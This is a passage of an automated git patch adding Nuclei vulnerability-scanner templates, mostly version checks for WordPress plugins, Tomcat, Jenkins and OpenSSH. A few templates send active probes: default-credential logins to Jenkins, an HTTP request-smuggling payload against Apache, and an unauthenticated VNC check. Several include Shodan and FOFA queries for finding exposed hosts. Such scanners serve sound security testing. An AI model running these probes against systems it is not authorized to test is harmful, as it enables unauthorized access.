From dd17764b7d6feaf8133f1a61616f9d521c846757 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 15 Sep 2024 12:36:35 +0000 Subject: [PATCH] 20240915 --- date.txt | 2 +- poc.txt | 23 + poc/auth/jenkins-weak-password.yaml | 79 +-- poc/auth/noauth-vnc.yaml | 32 ++ poc/cve/CVE-2022-3459.yaml | 59 +++ poc/cve/CVE-2023-3410.yaml | 59 +++ poc/cve/CVE-2024-34750.yaml | 40 ++ poc/cve/CVE-2024-40725.yaml | 72 +++ poc/cve/CVE-2024-43044.yaml | 38 ++ poc/cve/CVE-2024-6409.yaml | 32 ++ poc/cve/CVE-2024-6482.yaml | 59 +++ poc/cve/CVE-2024-8246.yaml | 59 +++ poc/cve/CVE-2024-8271.yaml | 59 +++ poc/cve/CVE-2024-8479.yaml | 59 +++ poc/cve/CVE-2024-8669.yaml | 59 +++ poc/cve/CVE-2024-8724.yaml | 59 +++ poc/cve/CVE-2024-8797.yaml | 59 +++ poc/cve/cve-2017-11512.yaml | 20 +- poc/cve/cve-2018-1000671.yaml | 21 +- poc/cve/cve-2018-12300.yaml | 31 +- poc/cve/cve-2018-12675.yaml | 18 +- poc/cve/cve-2018-9161.yaml | 22 +- poc/cve/cve-2019-10758.yaml | 34 +- poc/cve/cve-2020-36365.yaml | 30 +- poc/cve/cve-2021-21311.yaml | 65 ++- poc/cve/cve-2021-25111.yaml | 24 +- poc/cve/cve-2022-0149.yaml | 27 +- poc/cve/cve-2022-27849.yaml | 20 +- poc/detect/hipcam-detect.yaml | 50 ++ poc/detect/rockwell-plc-detect.yaml | 234 +++++++++ poc/detect/wowza-streaming-detect.yaml | 6 +- poc/exposed/frontpage-exposure.yaml | 34 ++ poc/java/jboss-web-console.yaml | 42 +- poc/jenkins/jenkins-weak-password.yaml | 79 +-- ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 +- poc/other/Dahua_getUserInfoByUserName.yaml | 18 +- poc/other/gavazzi-automation.yaml | 87 ++++ poc/other/intank-iiot.yaml | 43 ++ poc/other/siemens-simatic.yaml | 34 ++ .../woocommerce-multiple-free-gift.yaml | 59 +++ poc/sql/mass-sqli.yaml | 476 ++++++++++++++++++ poc/sql_injection/mass-sqli.yaml | 476 ++++++++++++++++++ poc/upload/Dahua_Video_FileUpload.yaml | 42 +- ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 +- poc/web/jboss-web-console.yaml | 42 +- 45 files changed, 2688 insertions(+), 289 deletions(-) mode change 100755 => 100644 poc/auth/jenkins-weak-password.yaml create mode 100644 poc/auth/noauth-vnc.yaml create mode 100644 poc/cve/CVE-2022-3459.yaml create mode 100644 poc/cve/CVE-2023-3410.yaml create mode 100644 poc/cve/CVE-2024-34750.yaml create mode 100644 poc/cve/CVE-2024-40725.yaml create mode 100644 poc/cve/CVE-2024-43044.yaml create mode 100644 poc/cve/CVE-2024-6409.yaml create mode 100644 poc/cve/CVE-2024-6482.yaml create mode 100644 poc/cve/CVE-2024-8246.yaml create mode 100644 poc/cve/CVE-2024-8271.yaml create mode 100644 poc/cve/CVE-2024-8479.yaml create mode 100644 poc/cve/CVE-2024-8669.yaml create mode 100644 poc/cve/CVE-2024-8724.yaml create mode 100644 poc/cve/CVE-2024-8797.yaml create mode 100644 poc/detect/hipcam-detect.yaml create mode 100644 poc/detect/rockwell-plc-detect.yaml create mode 100644 poc/exposed/frontpage-exposure.yaml mode change 100755 => 100644 poc/java/jboss-web-console.yaml mode change 100755 => 100644 poc/jenkins/jenkins-weak-password.yaml create mode 100644 poc/other/gavazzi-automation.yaml create mode 100644 poc/other/intank-iiot.yaml create mode 100644 poc/other/siemens-simatic.yaml create mode 100644 poc/remote_code_execution/woocommerce-multiple-free-gift.yaml create mode 100644 poc/sql/mass-sqli.yaml create mode 100644 poc/sql_injection/mass-sqli.yaml mode change 100755 => 100644 poc/web/jboss-web-console.yaml diff --git a/date.txt b/date.txt index 84c2c89a52..5cbbe5defc 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240914 +20240915 diff --git a/poc.txt b/poc.txt index ea3ba5bf1a..9f2ce16d60 100644 --- a/poc.txt +++ b/poc.txt @@ -4146,6 +4146,7 @@ ./poc/auth/nexus-default-password.yml ./poc/auth/nexus-repository-unauthentication.yaml ./poc/auth/nifi-api-unauthorized-access.yaml +./poc/auth/noauth-vnc.yaml ./poc/auth/nodered-default-login.yaml ./poc/auth/noescape-login.yaml ./poc/auth/novnc-login-panel.yaml @@ -21024,6 +21025,7 @@ ./poc/cve/CVE-2022-34534.yaml ./poc/cve/CVE-2022-34576.yaml ./poc/cve/CVE-2022-3459-f874164b02061f0298b7dc031fdb9eac.yaml +./poc/cve/CVE-2022-3459.yaml ./poc/cve/CVE-2022-34590.yaml ./poc/cve/CVE-2022-3462-ccd003276e3aa019c522c97354bbeff8.yaml ./poc/cve/CVE-2022-3462.yaml @@ -27402,6 +27404,7 @@ ./poc/cve/CVE-2023-3409.yaml ./poc/cve/CVE-2023-34096.yaml ./poc/cve/CVE-2023-3410-dda648f2ccaffe250c2835aba9f08374.yaml +./poc/cve/CVE-2023-3410.yaml ./poc/cve/CVE-2023-3411-4bb68b0a1ff203797dd994de340b8afb.yaml ./poc/cve/CVE-2023-3411.yaml ./poc/cve/CVE-2023-3412-3d1ceef933d1264cbbd03dc26c5b83ef.yaml @@ -37969,6 +37972,7 @@ ./poc/cve/CVE-2024-3474.yaml ./poc/cve/CVE-2024-3475-1233901f48139788794a7252044053ed.yaml ./poc/cve/CVE-2024-3475.yaml +./poc/cve/CVE-2024-34750.yaml ./poc/cve/CVE-2024-34751-8fefb0096cfe37c29f9bcc18ed431dbb.yaml ./poc/cve/CVE-2024-34751.yaml ./poc/cve/CVE-2024-34752-a2a693489a5ca358f1243ce5d57683db.yaml @@ -39953,6 +39957,7 @@ ./poc/cve/CVE-2024-4057.yaml ./poc/cve/CVE-2024-4061-7d27faa8767de65d446af82e8cb546ee.yaml ./poc/cve/CVE-2024-4061.yaml +./poc/cve/CVE-2024-40725.yaml ./poc/cve/CVE-2024-4077-810356fac1d68873d9e790939148b3f0.yaml ./poc/cve/CVE-2024-4077.yaml ./poc/cve/CVE-2024-4082-50825b3df742f81debb8f24874dd3aa4.yaml @@ -40107,6 +40112,7 @@ ./poc/cve/CVE-2024-4290.yaml ./poc/cve/CVE-2024-4295-f887ea45b60e88fcf428c70a1901be12.yaml ./poc/cve/CVE-2024-4295.yaml +./poc/cve/CVE-2024-43044.yaml ./poc/cve/CVE-2024-4305-637eadcd24b75860f6993f7f01fc3e2a.yaml ./poc/cve/CVE-2024-4305.yaml ./poc/cve/CVE-2024-43116-41d711f6515b000671ba62e9e183e8b2.yaml @@ -42138,6 +42144,7 @@ ./poc/cve/CVE-2024-6405.yaml ./poc/cve/CVE-2024-6408-313f9e2ba0a4ee6e8c1c902f6f31e4dd.yaml ./poc/cve/CVE-2024-6408.yaml +./poc/cve/CVE-2024-6409.yaml ./poc/cve/CVE-2024-6410-e0557d736e6d7ba9354551c87bc46975.yaml ./poc/cve/CVE-2024-6410.yaml ./poc/cve/CVE-2024-6411-78a7b3d7c96c66a5618e0f92b6cf3978.yaml @@ -42178,6 +42185,7 @@ ./poc/cve/CVE-2024-6481-8bb84297d1313840ad504743c863bb15.yaml ./poc/cve/CVE-2024-6481.yaml ./poc/cve/CVE-2024-6482-577fd97d26b95e756263126ef60c6a37.yaml +./poc/cve/CVE-2024-6482.yaml ./poc/cve/CVE-2024-6487-af8f4fe7694bfc08570956a253ee5369.yaml ./poc/cve/CVE-2024-6487.yaml ./poc/cve/CVE-2024-6489-bc7ee27fc8cd45d366588f7c757a9c55.yaml @@ -42823,6 +42831,7 @@ ./poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml ./poc/cve/CVE-2024-8242.yaml ./poc/cve/CVE-2024-8246-902383001b6a5bc20eed5f0cb307c0ed.yaml +./poc/cve/CVE-2024-8246.yaml ./poc/cve/CVE-2024-8247-7ddc0c06e971c1cf25a0f3f37508e6b0.yaml ./poc/cve/CVE-2024-8247.yaml ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml @@ -42834,6 +42843,7 @@ ./poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml ./poc/cve/CVE-2024-8269.yaml ./poc/cve/CVE-2024-8271-13221a05cbda5251ef0c446e5653da53.yaml +./poc/cve/CVE-2024-8271.yaml ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml ./poc/cve/CVE-2024-8274.yaml ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml @@ -42866,6 +42876,7 @@ ./poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml ./poc/cve/CVE-2024-8478.yaml ./poc/cve/CVE-2024-8479-1ca994835b1b496ace2cec8e13acae4d.yaml +./poc/cve/CVE-2024-8479.yaml ./poc/cve/CVE-2024-8480-f1d8d42bfc1633b849f4ef6346a133c9.yaml ./poc/cve/CVE-2024-8480.yaml ./poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml @@ -42887,9 +42898,11 @@ ./poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml ./poc/cve/CVE-2024-8665.yaml ./poc/cve/CVE-2024-8669-48017cad1d0f5431615877a08826da9a.yaml +./poc/cve/CVE-2024-8669.yaml ./poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml ./poc/cve/CVE-2024-8714.yaml ./poc/cve/CVE-2024-8724-9019a55c2cb51d14586e3502543ceb09.yaml +./poc/cve/CVE-2024-8724.yaml ./poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml ./poc/cve/CVE-2024-8730.yaml ./poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml @@ -42905,6 +42918,7 @@ ./poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml ./poc/cve/CVE-2024-8747.yaml ./poc/cve/CVE-2024-8797-c59dee142d9f249969c44faf56beb682.yaml +./poc/cve/CVE-2024-8797.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -52490,6 +52504,7 @@ ./poc/detect/hikvision-detection-7954.yaml ./poc/detect/hikvision-detection-7955.yaml ./poc/detect/hikvision-detection.yaml +./poc/detect/hipcam-detect.yaml ./poc/detect/home-assistant-detect.yaml ./poc/detect/hp-blade-admin-detect-8003.yaml ./poc/detect/hp-blade-admin-detect-8004.yaml @@ -53036,6 +53051,7 @@ ./poc/detect/rhymix-cms-detect-9879.yaml ./poc/detect/rhymix-cms-detect.yaml ./poc/detect/riak-detect.yaml +./poc/detect/rockwell-plc-detect.yaml ./poc/detect/room-alert-detect.yaml ./poc/detect/rosariosis-detect.yaml ./poc/detect/routeros-version-detect.yaml @@ -54601,6 +54617,7 @@ ./poc/exposed/flink-exposure-7511.yaml ./poc/exposed/flink-exposure.yaml ./poc/exposed/forgejo-repo-exposure.yaml +./poc/exposed/frontpage-exposure.yaml ./poc/exposed/ftp-credentials-exposure-7567.yaml ./poc/exposed/ftp-credentials-exposure-7568.yaml ./poc/exposed/ftp-credentials-exposure.yaml @@ -75102,6 +75119,7 @@ ./poc/other/garmin-connect.yaml ./poc/other/gate-one.yaml ./poc/other/gateone-workflow.yaml +./poc/other/gavazzi-automation.yaml ./poc/other/gb-gallery-slideshow-00a9466671a0e69d0aedfaee9145654e.yaml ./poc/other/gb-gallery-slideshow.yaml ./poc/other/gc-testimonials-51b93fe3d2a5697bc6c0c88b51bb094c.yaml @@ -77306,6 +77324,7 @@ ./poc/other/institutions-directory-05c9e1ca16738cd78fe38ca1f2073848.yaml ./poc/other/institutions-directory.yaml ./poc/other/instructables.yaml +./poc/other/intank-iiot.yaml ./poc/other/integracao-rd-station-198030404c9ce55b50e42f8d3447992c.yaml ./poc/other/integracao-rd-station-f273da08ce04eb7ca8ff220d5e6ae640.yaml ./poc/other/integracao-rd-station.yaml @@ -87591,6 +87610,7 @@ ./poc/other/sidekiq-dashboard.yaml ./poc/other/sidekiq-workflow.yaml ./poc/other/sidekiq.yaml +./poc/other/siemens-simatic.yaml ./poc/other/sigma_wide.yaml ./poc/other/signal-phish.yaml ./poc/other/signature-verification-management-system.yaml @@ -98799,6 +98819,7 @@ ./poc/remote_code_execution/woocommerce-multiple-customer-addresses-e58fd6fc55781d41aa60974eac75f757.yaml ./poc/remote_code_execution/woocommerce-multiple-customer-addresses.yaml ./poc/remote_code_execution/woocommerce-multiple-free-gift-939e3a08a9f8b49368755587a40c875e.yaml +./poc/remote_code_execution/woocommerce-multiple-free-gift.yaml ./poc/remote_code_execution/woocommerce-ninjaforms-product-addons-fe7479a6b6025e86397ca09e26459aa3.yaml ./poc/remote_code_execution/woocommerce-ninjaforms-product-addons.yaml ./poc/remote_code_execution/woocommerce-one-page-checkout-0fb2ac203a6e2b270723afe1dd3e678a.yaml @@ -106012,6 +106033,7 @@ ./poc/sql/marmoset-viewer-d601c9bb70361b55fc57dbc9a11ed725.yaml ./poc/sql/mashsharer-99c04b0c6cdb3ef571a7d8d62a6a8e40.yaml ./poc/sql/mass-pagesposts-creator-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/mass-sqli.yaml ./poc/sql/master-addons-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/master-addons-daa4129ec4b09b68fe1dbfb68e8ccb96.yaml ./poc/sql/master-blocks-6477bf18cad6c823db485408d49b337b.yaml @@ -109204,6 +109226,7 @@ ./poc/sql_injection/leaguemanager-sqli.yaml ./poc/sql_injection/loancms-sqli.yaml ./poc/sql_injection/magicflow-sqli.yaml +./poc/sql_injection/mass-sqli.yaml ./poc/sql_injection/material-dashboard-2-by-creative-sql-injection.yaml ./poc/sql_injection/maticsoft-shop-sqli.yaml ./poc/sql_injection/mcms-list-do-sqli.yaml diff --git a/poc/auth/jenkins-weak-password.yaml b/poc/auth/jenkins-weak-password.yaml old mode 100755 new mode 100644 index 84d3b8f678..08508605ce --- a/poc/auth/jenkins-weak-password.yaml +++ b/poc/auth/jenkins-weak-password.yaml @@ -1,45 +1,52 @@ id: jenkins-weak-password info: name: Jenkins Default Login - author: - - l0ne1y - tags: - - jenkins - - default-login - description: |- - Jenkins 默认口令登录漏洞 - CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。Audit Trail Plugin是使用在其中的一个审核日志记录插件。其管理后台存在默认账户admin/admin,攻击者可通过默认账户登录后台实施高危操作。 + author: Zandros0 severity: high + tags: jenkins,default-login + description: Jenkins default admin login information was discovered. classification: - cwe-id: - - cwe-522 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - remediation: |- - 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 - 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 - 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 - 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) - 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) + cve-id: + cwe-id: CWE-522 requests: -- matchers: - - type: dsl - condition: and - dsl: - - contains(body_3, "/logout") - - contains(body_3, "Dashboard [Jenkins]") - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - | - POST /j_spring_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + - | + POST /j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: {{cookie}} - j_username=admin&j_password=admin&from=%2F&Submit=Sign+in - - | - GET / HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - req-condition: true + j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: {{cookie}} + attack: pitchfork + payloads: + username: + - admin + - jenkins + password: + - admin + - password + extractors: + - type: regex + name: cookie + internal: true + part: header + regex: + - 'JSESSIONID\..*=([a-z0-9.]+)' + req-condition: true + matchers: + - type: dsl + condition: and + dsl: + - 'contains(body_3, "/logout")' + - 'contains(body_3, "Dashboard [Jenkins]")' + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/noauth-vnc.yaml b/poc/auth/noauth-vnc.yaml new file mode 100644 index 0000000000..17d83bbccf --- /dev/null +++ b/poc/auth/noauth-vnc.yaml @@ -0,0 +1,32 @@ +id: exposed-vnc-no-auth + +info: + name: Exposed VNC Server No-Auth + author: Redflare Cyber + severity: high + description: This template checks for VNC servers that do not require authentication, which can allow unauthorized access to the system. + classification: + cwe-id: CWE-306 + metadata: + max-request: 1 + shodan-query: 'port:5900 product:"VNC"' + tags: network,vnc,exposed,no-auth,tcp + +tcp: + - inputs: + - data: "\r\n" + host: + - "{{Hostname}}" + port: 5900,5901,5902 + + matchers: + - type: word + words: + - "RFB" + + extractors: + - type: regex + part: body + regex: + - "Authentication disabled" + diff --git a/poc/cve/CVE-2022-3459.yaml b/poc/cve/CVE-2022-3459.yaml new file mode 100644 index 0000000000..c46854dfde --- /dev/null +++ b/poc/cve/CVE-2022-3459.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-3459 + +info: + name: > + WooCommerce Multiple Free Gift <= 1.2.3 - Insufficient Server-Side Validation to Arbitrary Gift Adding + author: topscoder + severity: medium + description: > + The WooCommerce Multiple Free Gift plugin for WordPress is vulnerable to gift manipulation in all versions up to, and including, 1.2.3. This is due to plugin not enforcing server-side checks on the products that can be added as a gift. This makes it possible for unauthenticated attackers to add non-gift items to their cart as a gift. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdb9c321-1a2c-4593-9947-2071a908ee1c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-3459 + metadata: + fofa-query: "wp-content/plugins/woocommerce-multiple-free-gift/" + google-query: inurl:"/wp-content/plugins/woocommerce-multiple-free-gift/" + shodan-query: 'vuln:CVE-2022-3459' + tags: cve,wordpress,wp-plugin,woocommerce-multiple-free-gift,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-multiple-free-gift/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-multiple-free-gift" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2023-3410.yaml b/poc/cve/CVE-2023-3410.yaml new file mode 100644 index 0000000000..65f7bf732c --- /dev/null +++ b/poc/cve/CVE-2023-3410.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-3410 + +info: + name: > + Bricks <= 1.10.1 - Authenticated (Bricks Page Builder Access+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Bricks theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘customTag' attribute in versions up to, and including, 1.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with access to the Bricks Builder (admin-only by default), to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This becomes more of an issue when Bricks Builder access is granted to lower-privileged users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba5e93a2-8f42-4747-86fa-297ba709be8f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-3410 + metadata: + fofa-query: "wp-content/themes/bricks/" + google-query: inurl:"/wp-content/themes/bricks/" + shodan-query: 'vuln:CVE-2023-3410' + tags: cve,wordpress,wp-theme,bricks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/bricks/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bricks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.10.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-34750.yaml b/poc/cve/CVE-2024-34750.yaml new file mode 100644 index 0000000000..698186dc67 --- /dev/null +++ b/poc/cve/CVE-2024-34750.yaml @@ -0,0 +1,40 @@ +id: CVE-2024-34750 + +info: + name: CVE-2024-34750 + author: Redflare Cyber + severity: high + description: Improper Handling of Exceptional Conditions, Uncontrolled Resource Consumption vulnerability in Apache Tomcat. When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams which in turn led to the use of an incorrect infinite timeout which allowed connections to remain open which should have been closed. + classification: + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: apache + product: tomcat + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" + tags: tech,tomcat,apache,intrusive + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/{{randstr}}" + - "{{BaseURL}}/docs/introduction.html" + + stop-at-first-match: true + + extractors: + - type: regex + name: version + group: 1 + regex: + - '(?i)Apache Tomcat.*((11\.0\.0-M([1-9]|1[0-9]|20))|(10\.1\.0-M([1-9]|1[0-9]|2[0-4]))|(9\.0\.(0-M[1-9]|0-M1[0-9]|0-M20|[1-8][0-9]|9[0-8])))' + diff --git a/poc/cve/CVE-2024-40725.yaml b/poc/cve/CVE-2024-40725.yaml new file mode 100644 index 0000000000..7943b81d4c --- /dev/null +++ b/poc/cve/CVE-2024-40725.yaml @@ -0,0 +1,72 @@ +id: CVE-2024-40725 +info: + name: Apache HTTP Server HTTP Request Smuggling (CVE-2024-40725) + author: Redflare Cyber + severity: high + description: Detects the presence of CVE-2024-40725 vulnerability in Apache HTTP Server using HTTP Request Smuggling techniques. + reference: + - https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898 + tags: cve, http-request-smuggling, apache, mod_proxy + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + part: header + regex: + - "Server: Apache/2\\.4\\.[0-5][0-9]" + - "Server: Apache/2\\.4\\.6[0-1]" + name: server_version + + matchers: + - type: regex + part: header + regex: + - "Server: Apache/2\\.4\\.[0-5][0-9]" + - "Server: Apache/2\\.4\\.6[0-1]" + + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Connection: Keep-Alive, Proxy-Authenticate + + matchers: + - type: regex + part: header + regex: + - "Proxy-Authenticate" + + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Length: 0 + Transfer-Encoding: chunked + + 0 + + GET /admin HTTP/1.1 + Host: {{Hostname}} + User-Agent: smuggle-test + + matchers: + - type: word + part: body + words: + - "admin" + - type: status + status: + - 200 + + extractors: + - type: regex + part: header + regex: + - "Server: Apache/2\\.4\\.[0-5][0-9]" + - "Server: Apache/2\\.4\\.6[0-1]" + name: server_version diff --git a/poc/cve/CVE-2024-43044.yaml b/poc/cve/CVE-2024-43044.yaml new file mode 100644 index 0000000000..7fa0a9ff05 --- /dev/null +++ b/poc/cve/CVE-2024-43044.yaml @@ -0,0 +1,38 @@ +id: CVE-2024-43044 + +info: + name: CVE-2024-43044 + author: Redflare Cyber + reference: + - https://www.jenkins.io/security/advisory/2024-08-07/ #advisory + - https://github.com/convisolabs/CVE-2024-43044-jenkins #exploit + - https://nvd.nist.gov/vuln/detail/CVE-2024-43044 + severity: high + description: Jenkins' Remoting library enables communication between the controller and agents, allowing Java objects and plugins to be executed on agents. Vulnerabilities in versions up to 2.470 and LTS 2.452.3 allow agents and attackers with Agent/Connect permission to read arbitrary files from the controllers file system. + tags: lfr,jenkins + metadata: + shodan-query: 'product:"Jenkins"' + +requests: + - method: GET + path: + - "{{BaseURL}}/whoAmI/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'X-Jenkins:' + + extractors: + - type: regex + part: header + group: 1 + regex: + # Match Jenkins versions up to 2.470 or LTS 2.452.3 + - "X-Jenkins: ((2\\.([0-3]?\\d{1,2}|4[0-6]?\\d{0,1}|470))(\\.[0-9]+)?|([0-1]?\\d{1,2})(\\.[0-9]+)?|2\\.452\\.([0-2]|3))" diff --git a/poc/cve/CVE-2024-6409.yaml b/poc/cve/CVE-2024-6409.yaml new file mode 100644 index 0000000000..209a63a2ca --- /dev/null +++ b/poc/cve/CVE-2024-6409.yaml @@ -0,0 +1,32 @@ +id: CVE-2024-6409 + +info: + name: CVE-2024-6409 + author: Redflare Cyber + severity: high + description: Race Condition in OpenSSH versions 8.7 and 8.8, allows for potential remote code execution (RCE) due to a race condition in signal handling within the privilege separation (privsep) child process. + classification: + cve-id: CVE-2024-6409 + metadata: + max-request: 2 + vendor: OpenSSH + shodan: product:"OpenSSH" version:"8.7p1,8.8p1" + product: OpenSSH + tags: cve,cve2024,regression,openssh,ssh + +tcp: + - host: + - '{{Hostname}}' + - '{{Host}}:22' + + inputs: + - data: "SSH-2.0-OpenSSH_9.0\r\n" + + matchers: + - type: regex + part: body + regex: + - 'OpenSSH_(8\.7p1|8\.8p1)' + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2024-6482.yaml b/poc/cve/CVE-2024-6482.yaml new file mode 100644 index 0000000000..3e3fc23a42 --- /dev/null +++ b/poc/cve/CVE-2024-6482.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6482 + +info: + name: > + Login with phone number <= 1.7.49 - Authenticated (Subscriber+) Authorization Bypass to Privilege Escalation + author: topscoder + severity: low + description: > + The Login with phone number plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.7.49. This is due to a lack of validation and missing capability check on user-supplied data in the 'lwp_update_password_action' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to any other role, including Administrator. The vulnerability was partially patched in version 1.7.40. The login with phone number pro plugin was required to exploit the vulnerability in versions 1.7.40 - 1.7.49. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/de7cde2c-142c-4004-9302-be335265d87d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-6482 + metadata: + fofa-query: "wp-content/plugins/login-with-phone-number/" + google-query: inurl:"/wp-content/plugins/login-with-phone-number/" + shodan-query: 'vuln:CVE-2024-6482' + tags: cve,wordpress,wp-plugin,login-with-phone-number,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-with-phone-number/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-with-phone-number" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.49') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8246.yaml b/poc/cve/CVE-2024-8246.yaml new file mode 100644 index 0000000000..ef152a5c54 --- /dev/null +++ b/poc/cve/CVE-2024-8246.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8246 + +info: + name: > + Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) <= 2.8.11 - Authenticated (Contributor+) Privilege Escalation + author: topscoder + severity: low + description: > + The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.8.11. This is due to plugin not properly restricting what users have access to set the default role on registration forms. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with a custom role that allows them to register as administrators. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/40760f60-b81a-447b-a2c8-83c7666ce410?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-8246 + metadata: + fofa-query: "wp-content/plugins/buddyforms/" + google-query: inurl:"/wp-content/plugins/buddyforms/" + shodan-query: 'vuln:CVE-2024-8246' + tags: cve,wordpress,wp-plugin,buddyforms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - 